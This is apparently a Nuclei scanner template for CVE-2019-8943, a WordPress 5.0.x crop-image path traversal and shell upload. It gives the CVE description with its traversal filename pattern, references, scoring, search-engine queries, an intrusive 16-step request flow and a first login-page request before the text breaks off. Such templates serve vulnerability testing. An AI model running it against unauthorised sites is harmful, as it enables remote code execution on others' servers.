id: CVE-2019-8943 info: name: WordPress Core 5.0.0 - Crop-image Shell Upload author: sttlr severity: medium description: | WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring. reference: - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ - http://packetstormsecurity.com/files/152396/WordPress-5.0.0-crop-image-Shell-Upload.html - http://packetstormsecurity.com/files/161213/WordPress-5.0.0-Remote-Code-Execution.html - http://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce - https://tryhackme.com/r/room/blog classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2019-8943 cwe-id: CWE-22 epss-score: 0.92778 epss-percentile: 0.99097 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true vendor: wordpress product: wordpress shodan-query: - http.component:"wordpress" - cpe:"cpe:2.3:a:wordpress:wordpress" fofa-query: body="oembed" && body="wp-" tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme variables: image_filename: "{{rand_text_alpha(10)}}" string: "{{to_lower(rand_text_alpha(5))}}" flow: http(1) && http(2) && (http(3) || http(4)) && http(5) && http(6) && http(7) && http(8) && http(9) && http(10) && http(11) && http(12) && http(13) && http(14) && http(15) && http(16) http: - raw: - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "WordPress" - '/wp-login.php?action=lostpassword">Lost your password?' - '